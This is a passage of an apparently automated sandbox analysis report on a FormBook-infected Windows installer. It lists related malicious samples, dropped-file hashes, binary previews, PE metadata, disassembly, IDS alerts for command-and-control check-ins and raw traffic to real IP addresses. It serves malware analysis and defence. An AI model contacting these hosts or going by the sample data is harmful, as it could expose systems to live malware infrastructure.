                                                                          • 74.220.199.8
                                                                          FidKy67SWO.exeGet hashmaliciousBrowse
                                                                          • 192.254.185.252
                                                                          RFQ-BCM 03122020.exeGet hashmaliciousBrowse
                                                                          • 50.87.249.240
                                                                          plan-1637276620.xlsmGet hashmaliciousBrowse
                                                                          • 192.185.21.116
                                                                          idea-1232922316.xlsbGet hashmaliciousBrowse
                                                                          • 162.241.194.107
                                                                          Orden de compra.exeGet hashmaliciousBrowse
                                                                          • 192.185.0.218
                                                                          Drawing.exeGet hashmaliciousBrowse
                                                                          • 162.241.61.229
                                                                          aim-1028486377.xlsbGet hashmaliciousBrowse
                                                                          • 192.232.222.161
                                                                          VM_5823_05_24_2-2.htmlGet hashmaliciousBrowse
                                                                          • 162.214.148.174
                                                                          KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                          • 162.241.87.244
                                                                          KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                          • 162.241.61.218
                                                                          KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                          • 162.241.87.244
                                                                          eHTLcWfhgv.exeGet hashmaliciousBrowse
                                                                          • 74.220.199.8
                                                                          Lebanon Khayat Trading Company.exeGet hashmaliciousBrowse
                                                                          • 192.254.185.244
                                                                          Purchase_Order.exeGet hashmaliciousBrowse
                                                                          • 50.87.249.240
                                                                          paw.exeGet hashmaliciousBrowse
                                                                          • 192.185.20.31
                                                                          TEAMINTERNET-ASDEKBzeB23bE1.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.13
                                                                          xnuE49NGol.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.11
                                                                          aVzUZCHkko.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.11
                                                                          PO#310521.PDF.exeGet hashmaliciousBrowse
                                                                          • 185.53.178.10
                                                                          Scanned Specification Catalogue 7464.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.52
                                                                          Ciikfddtznhxmtqufdujkifxwmwhrfjkcl_Signed_.exeGet hashmaliciousBrowse
                                                                          • 185.53.178.53
                                                                          $RAULIU9.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.31
                                                                          350969bc_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.53
                                                                          GLqbDRKePPp16Zr.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.12
                                                                          sample3.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.12
                                                                          RFQ-14042021 Guangzhou Haotian Equipment Technology Co., Ltd,pdf.exeGet hashmaliciousBrowse
                                                                          • 185.53.178.11
                                                                          bd.exeGet hashmaliciousBrowse
                                                                          • 185.53.178.30
                                                                          bee.exeGet hashmaliciousBrowse
                                                                          • 185.53.178.30
                                                                          Require your Sales Ledger from 01-April-2020.exeGet hashmaliciousBrowse
                                                                          • 185.53.179.90
                                                                          52FFDD3BC0DE63EB8F6CD8A90373EAF3BCC37BB0804FC.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.71
                                                                          PO#560.zip.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.14
                                                                          safecrypt.exeGet hashmaliciousBrowse
                                                                          • 185.53.178.54
                                                                          RFQ HAN4323.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.11
                                                                          Doc.exeGet hashmaliciousBrowse
                                                                          • 185.53.178.14
                                                                          payment slip_pdf.exeGet hashmaliciousBrowse
                                                                          • 185.53.177.10
                                                                          AMAZON-02USKCqjqClweR.exeGet hashmaliciousBrowse
                                                                          • 52.221.201.97
                                                                          RFQ 06-21.xlsxGet hashmaliciousBrowse
                                                                          • 3.35.217.223
                                                                          Ejima.exeGet hashmaliciousBrowse
                                                                          • 52.14.32.15
                                                                          PO 06-22.xlsxGet hashmaliciousBrowse
                                                                          • 3.35.217.223
                                                                          DHL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                          • 75.2.26.18
                                                                          New Order_PO 1164_HD-F 4020 6K.exeGet hashmaliciousBrowse
                                                                          • 13.59.53.244
                                                                          QUOTATION.ZIP.exeGet hashmaliciousBrowse
                                                                          • 76.223.26.96
                                                                          customer1.exeGet hashmaliciousBrowse
                                                                          • 18.185.153.48
                                                                          customer2.exeGet hashmaliciousBrowse
                                                                          • 52.29.138.39
                                                                          Swift advice Receipt.exeGet hashmaliciousBrowse
                                                                          • 52.58.78.16
                                                                          June 21st,2021.exeGet hashmaliciousBrowse
                                                                          • 13.59.53.244
                                                                          Payment update.exeGet hashmaliciousBrowse
                                                                          • 3.143.65.214
                                                                          8uswh8RLwO.exeGet hashmaliciousBrowse
                                                                          • 18.134.243.168
                                                                          KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                          • 18.136.132.202
                                                                          KTOpmUzBlp.xlsGet hashmaliciousBrowse
                                                                          • 18.136.132.202
                                                                          eHTLcWfhgv.exeGet hashmaliciousBrowse
                                                                          • 99.83.154.118
                                                                          fS5DVkL6jm.exeGet hashmaliciousBrowse
                                                                          • 75.2.19.252
                                                                          xJP0w1Ze2J.apkGet hashmaliciousBrowse
                                                                          • 54.189.163.81
                                                                          SOAOG31JdG.dllGet hashmaliciousBrowse
                                                                          • 13.225.75.73
                                                                          Arquivo archivo.htmlGet hashmaliciousBrowse
                                                                          • 13.224.195.125

                                                                          JA3 Fingerprints

                                                                          No context

                                                                          Dropped Files

                                                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                          C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dllNew Order.exeGet hashmaliciousBrowse
                                                                            hesaphareketi-0.exeGet hashmaliciousBrowse
                                                                              0FKzNO1g3P.exeGet hashmaliciousBrowse
                                                                                mlzHNUHkUl.exeGet hashmaliciousBrowse
                                                                                  Ejima.exeGet hashmaliciousBrowse
                                                                                    UrgentNewOrder_pdf.exeGet hashmaliciousBrowse
                                                                                      Swift 001.exeGet hashmaliciousBrowse
                                                                                        DHL DOCUMENTS.exeGet hashmaliciousBrowse
                                                                                          DHL Shipment Documents.exeGet hashmaliciousBrowse
                                                                                            20210622-kll98374.exeGet hashmaliciousBrowse
                                                                                              SKMTC_STOMANAS_7464734648592848Ordengdoc.exeGet hashmaliciousBrowse
                                                                                                Orden de compra.exeGet hashmaliciousBrowse
                                                                                                  Pending delivery - Final Attempt.exeGet hashmaliciousBrowse
                                                                                                    2bni49vTpt.exeGet hashmaliciousBrowse
                                                                                                      rJIeeo2B7Q.exeGet hashmaliciousBrowse
                                                                                                        e-hesap bildirimi.exeGet hashmaliciousBrowse
                                                                                                          Draft Booking Confirmation 062120297466471346.exeGet hashmaliciousBrowse
                                                                                                            HalkbankEkstre0609202138711233847204.exeGet hashmaliciousBrowse
                                                                                                              232.exeGet hashmaliciousBrowse
                                                                                                                Yeni Siparis.exeGet hashmaliciousBrowse

                                                                                                                  Created / dropped Files

                                                                                                                  C:\Users\user\AppData\Local\Temp\fy9bu4fvmp6z54he
                                                                                                                  Process:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):164863
                                                                                                                  Entropy (8bit):7.989487694845126
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3072:3mZiKhENRWASxlTdjg2PW5CuBa4aoiPywVqsWkukAgXN5W3Adsaq4pHAuo:gmol1rPW5CmaoC7WkukAgXLWTv4dlo
                                                                                                                  MD5:1B7604BC8F65C9852474C134A887600F
                                                                                                                  SHA1:D7ABB58249F1372260C8FC2B18ADDF50BE3FFC6F
                                                                                                                  SHA-256:97BF249F913024B346AC8BC57F0637E50FB1A7238C33BDCA79BCDD6AA68462B6
                                                                                                                  SHA-512:5927CE6017903CF9D9B770190634A7C66A8F2A4B0D797EA0AABF60EA2DFDDDEC99ED3A655B3F5A7D80920B193B29397304C4C5781907340BBD8B067D31BA61CF
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview: .....`.Q].......3..q.........)E/..^..ol.O...#.......+~=..../PAW,G..;q..63...8.">..i.F.W..g`"l..Z.S....Iq-.v.R....RD?..w.H. ..Fa.;s#|.U Of.c....5r...i(<4.-....."*=?.."{.y.w.....~R...C..).~.o..........X......B...).....8.r-7.`{.....q&.l(.*C.M..Z........`.Q]|.o.N..^3)q=.........)E/..^k.ol.O...#.......+~=..../%. .G.... -.'N.:...y.+...........U.R........:..c.u...w.H. .....j.....0a.0T.s.v..f..o..L-...&..af.)z.....Ls....~.6...7.)A..(..........p.....J..).......r-}.`{.....&./(.*{.M/.sZ........`.Q].$o.P..^3)qz.........)E/..^..ol.O...#.......+~=..../%. .G.... -.'N.:...y.+...........U.R........:..c.u...w.H. .....j.....0a.0T.s.v..f..o..L-...&..af.)z....w.....~.......)A..(..........p........).......r-}.`{.....&./(.*{.M/.sZ........`.Q].$o.P..^3)qz.........)E/..^..ol.O...#.......+~=..../%. .G.... -.'N.:...y.+...........U.R........:..c.u...w.H. .....j.....0a.0T.s.v..f..o..L-...&..af.)z....w.....~.......)A..(..........p........).......r-}.`
                                                                                                                  C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll
                                                                                                                  Process:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):10752
                                                                                                                  Entropy (8bit):5.7425597599083344
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:uv+cJZE61KRWJQO6tFiUdK7ckK4k7l1XRBm0w+NiHi1GSJ:uf6rtFRduQ1W+fG8
                                                                                                                  MD5:56A321BD011112EC5D8A32B2F6FD3231
                                                                                                                  SHA1:DF20E3A35A1636DE64DF5290AE5E4E7572447F78
                                                                                                                  SHA-256:BB6DF93369B498EAA638B0BCDC4BB89F45E9B02CA12D28BCEDF4629EA7F5E0F1
                                                                                                                  SHA-512:5354890CBC53CE51081A78C64BA9C4C8C4DC9E01141798C1E916E19C5776DAC7C82989FAD0F08C73E81AABA332DAD81205F90D0663119AF45550B97B338B9CC3
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Joe Sandbox View:
                                                                                                                  • Filename: New Order.exe, Detection: malicious, Browse
                                                                                                                  • Filename: hesaphareketi-0.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 0FKzNO1g3P.exe, Detection: malicious, Browse
                                                                                                                  • Filename: mlzHNUHkUl.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Ejima.exe, Detection: malicious, Browse
                                                                                                                  • Filename: UrgentNewOrder_pdf.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Swift 001.exe, Detection: malicious, Browse
                                                                                                                  • Filename: DHL DOCUMENTS.exe, Detection: malicious, Browse
                                                                                                                  • Filename: DHL Shipment Documents.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 20210622-kll98374.exe, Detection: malicious, Browse
                                                                                                                  • Filename: SKMTC_STOMANAS_7464734648592848Ordengdoc.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Orden de compra.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Pending delivery - Final Attempt.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 2bni49vTpt.exe, Detection: malicious, Browse
                                                                                                                  • Filename: rJIeeo2B7Q.exe, Detection: malicious, Browse
                                                                                                                  • Filename: e-hesap bildirimi.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Draft Booking Confirmation 062120297466471346.exe, Detection: malicious, Browse
                                                                                                                  • Filename: HalkbankEkstre0609202138711233847204.exe, Detection: malicious, Browse
                                                                                                                  • Filename: 232.exe, Detection: malicious, Browse
                                                                                                                  • Filename: Yeni Siparis.exe, Detection: malicious, Browse
                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j....l.9..i....l.Richm.........................PE..L...X:.V...........!.................).......0...............................`......................................p2......t0..P............................P.......................................................0..X............................text............................... ..`.rdata.......0......."..............@..@.data...d....@.......&..............@....reloc.......P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\pplsesniiplv
                                                                                                                  Process:C:\Users\user\Desktop\WXs8v9QuE7.exe
                                                                                                                  File Type:DOS executable (COM)
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):57846
                                                                                                                  Entropy (8bit):5.240875887817307
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:Zc9QIQ54j6sW73BMrCd2BclVgMcGgN6oRD5nh:Zc9QIa4j6d7erC0BckMe6oBZh
                                                                                                                  MD5:81393E5DFDC6C78B387092FCE17F9D54
                                                                                                                  SHA1:3BC2E5FD9A8A81E848454C86350FD25117630A2D
                                                                                                                  SHA-256:2FC1AC7718451BC6863DFF20A20EFEAB36E68F0E7D1326C98347EC8837E8DADC
                                                                                                                  SHA-512:99C3294312C19C338C650A51861B53BF8A3F73FBA92A64C200F7A39BDA30A72F88F214F8F966752F0CDA6223FBC19DB1D2E2B359AB28B9E769D79943A06AB43A
                                                                                                                  Malicious:false
                                                                                                                  Reputation:low
                                                                                                                  Preview: .....U..H.......S..........e...............E.;.E.-.E...E.r.E.s.e..PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5......X[PS......;....+.....+..................5.........z.........J.......q+...-....+....................0.........+.3...Y..H......+.-....+._.......E...C3....J....#....g.....*........;..S+....+.._................j.t....0........-....3...O...+..........m..j.,.....+.+..............3...+.+....\..........B....}.....i+.3..63..n.......X+.+.3.....-......-.................+...q+.3..Z-......w........2.......;........3........ ........3.+.5....5...

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                  Entropy (8bit):7.882592624518728
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:WXs8v9QuE7.exe
                                                                                                                  File size:205564
                                                                                                                  MD5:1f45b0e2bd669bce49b2140373243a91
                                                                                                                  SHA1:6ea61f1b39548a8b9192c0606d6daeb2c071a190
                                                                                                                  SHA256:ef05dd27e2dc499d3c1f42f00525fea7204735acd45c7a03efb78a241a9f9660
                                                                                                                  SHA512:9ef1e51fd0ec8445842d70e6d71b555e11b4278c0ba7e32d2c5ea65ff0f6a7933d859ad68fa14530b589dde81c475849e1b1eb7ea575179267a98c7a55441f76
                                                                                                                  SSDEEP:3072:ABynOpL12rioc6MPPUFMG4F/IKyhLoKFvqu2w8mSAnBdcgOe9sAKwWE:ABlL/bHgMGm/WiKVquYmfdaIsOX
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...e:.V.................\...........0.......p....@

                                                                                                                  File Icon

                                                                                                                  Icon Hash:b2a88c96b2ca6a72

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x4030fb
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x56FF3A65 [Sat Apr 2 03:20:05 2016 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:b76363e9cb88bf9390860da8e50999d2

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  sub esp, 00000184h
                                                                                                                  push ebx
                                                                                                                  push ebp
                                                                                                                  push esi
                                                                                                                  push edi
                                                                                                                  xor ebx, ebx
                                                                                                                  push 00008001h
                                                                                                                  mov dword ptr [esp+20h], ebx
                                                                                                                  mov dword ptr [esp+14h], 00409168h
                                                                                                                  mov dword ptr [esp+1Ch], ebx
                                                                                                                  mov byte ptr [esp+18h], 00000020h
                                                                                                                  call dword ptr [004070B0h]
                                                                                                                  call dword ptr [004070ACh]
                                                                                                                  cmp ax, 00000006h
                                                                                                                  je 00007FD268D34AA3h
                                                                                                                  push ebx
                                                                                                                  call 00007FD268D37884h
                                                                                                                  cmp eax, ebx
                                                                                                                  je 00007FD268D34A99h
                                                                                                                  push 00000C00h
                                                                                                                  call eax
                                                                                                                  mov esi, 00407280h
                                                                                                                  push esi
                                                                                                                  call 00007FD268D37800h
                                                                                                                  push esi
                                                                                                                  call dword ptr [00407108h]
                                                                                                                  lea esi, dword ptr [esi+eax+01h]
                                                                                                                  cmp byte ptr [esi], bl
                                                                                                                  jne 00007FD268D34A7Dh
                                                                                                                  push 0000000Dh
                                                                                                                  call 00007FD268D37858h
                                                                                                                  push 0000000Bh
                                                                                                                  call 00007FD268D37851h
                                                                                                                  mov dword ptr [00423F44h], eax
                                                                                                                  call dword ptr [00407038h]
                                                                                                                  push ebx
                                                                                                                  call dword ptr [0040726Ch]
                                                                                                                  mov dword ptr [00423FF8h], eax
                                                                                                                  push ebx
                                                                                                                  lea eax, dword ptr [esp+38h]
                                                                                                                  push 00000160h
                                                                                                                  push eax
                                                                                                                  push ebx
                                                                                                                  push 0041F4F0h
                                                                                                                  call dword ptr [0040715Ch]
                                                                                                                  push 0040915Ch
                                                                                                                  push 00423740h
                                                                                                                  call 00007FD268D37484h
                                                                                                                  call dword ptr [0040710Ch]
                                                                                                                  mov ebp, 0042A000h
                                                                                                                  push eax
                                                                                                                  push ebp
                                                                                                                  call 00007FD268D37472h
                                                                                                                  push ebx
                                                                                                                  call dword ptr [00407144h]

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x74180xa0.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xc80.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x5aeb0x5c00False0.665123980978data6.42230569414IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x70000x11960x1200False0.458984375data5.20291736659IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x90000x1b0380x600False0.432291666667data4.0475118296IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                  .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0x2d0000xc800xe00False0.412109375data4.00712910454IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                  RT_ICON0x2d1d80x2e8dataEnglishUnited States
                                                                                                                  RT_DIALOG0x2d4c00x100dataEnglishUnited States
                                                                                                                  RT_DIALOG0x2d5c00x11cdataEnglishUnited States
                                                                                                                  RT_DIALOG0x2d6e00x60dataEnglishUnited States
                                                                                                                  RT_GROUP_ICON0x2d7400x14dataEnglishUnited States
                                                                                                                  RT_VERSION0x2d7580x254data
                                                                                                                  RT_MANIFEST0x2d9b00x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                                                                                                  USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                                                                                                  GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                                                                  SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                                                                                                  ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                                                                                                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                  ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                                                                                                  Version Infos

                                                                                                                  DescriptionData
                                                                                                                  LegalCopyrightlieutenant
                                                                                                                  FileVersion9.7.6.5
                                                                                                                  CompanyNamestone
                                                                                                                  LegalTrademarksapologizes
                                                                                                                  Commentsfirearms
                                                                                                                  ProductNamegrandeur
                                                                                                                  FileDescriptionundoubtedly
                                                                                                                  Translation0x0000 0x04e4

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Snort IDS Alerts

                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                  06/22/21-18:25:23.221652TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.575.2.124.199
                                                                                                                  06/22/21-18:25:23.221652TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.575.2.124.199
                                                                                                                  06/22/21-18:25:23.221652TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973780192.168.2.575.2.124.199
                                                                                                                  06/22/21-18:25:28.712452TCP1201ATTACK-RESPONSES 403 Forbidden8049743185.53.177.12192.168.2.5
                                                                                                                  06/22/21-18:25:50.296525TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.523.225.101.32
                                                                                                                  06/22/21-18:25:50.296525TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.523.225.101.32
                                                                                                                  06/22/21-18:25:50.296525TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975080192.168.2.523.225.101.32
                                                                                                                  06/22/21-18:25:55.696207TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.594.136.40.51
                                                                                                                  06/22/21-18:25:55.696207TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.594.136.40.51
                                                                                                                  06/22/21-18:25:55.696207TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975180192.168.2.594.136.40.51
                                                                                                                  06/22/21-18:26:06.571907TCP1201ATTACK-RESPONSES 403 Forbidden804975334.102.136.180192.168.2.5
                                                                                                                  06/22/21-18:26:27.789250TCP2031453ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.545.192.104.89
                                                                                                                  06/22/21-18:26:27.789250TCP2031449ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.545.192.104.89
                                                                                                                  06/22/21-18:26:27.789250TCP2031412ET TROJAN FormBook CnC Checkin (GET)4975580192.168.2.545.192.104.89

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Jun 22, 2021 18:25:11.219217062 CEST4972680192.168.2.5119.81.95.146
                                                                                                                  Jun 22, 2021 18:25:11.418889046 CEST8049726119.81.95.146192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:11.419002056 CEST4972680192.168.2.5119.81.95.146
                                                                                                                  Jun 22, 2021 18:25:11.419150114 CEST4972680192.168.2.5119.81.95.146
                                                                                                                  Jun 22, 2021 18:25:11.618474007 CEST8049726119.81.95.146192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:11.619210958 CEST8049726119.81.95.146192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:11.619240999 CEST8049726119.81.95.146192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:11.619385004 CEST4972680192.168.2.5119.81.95.146
                                                                                                                  Jun 22, 2021 18:25:11.619438887 CEST4972680192.168.2.5119.81.95.146
                                                                                                                  Jun 22, 2021 18:25:11.820360899 CEST8049726119.81.95.146192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:17.240540981 CEST4973280192.168.2.5222.239.248.209
                                                                                                                  Jun 22, 2021 18:25:17.505656004 CEST8049732222.239.248.209192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:17.506846905 CEST4973280192.168.2.5222.239.248.209
                                                                                                                  Jun 22, 2021 18:25:17.506963015 CEST4973280192.168.2.5222.239.248.209
                                                                                                                  Jun 22, 2021 18:25:17.773952961 CEST8049732222.239.248.209192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:17.774080992 CEST8049732222.239.248.209192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:17.774117947 CEST8049732222.239.248.209192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:17.774319887 CEST4973280192.168.2.5222.239.248.209
                                                                                                                  Jun 22, 2021 18:25:17.774372101 CEST4973280192.168.2.5222.239.248.209
                                                                                                                  Jun 22, 2021 18:25:18.038943052 CEST8049732222.239.248.209192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.178512096 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.221335888 CEST804973775.2.124.199192.168.2.5
                                                                                                                  Jun 22, 2021 18:25:23.221569061 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.221652031 CEST4973780192.168.2.575.2.124.199
                                                                                                                  Jun 22, 2021 18:25:23.264619112 CEST804973775.2.124.199192.168.2.5
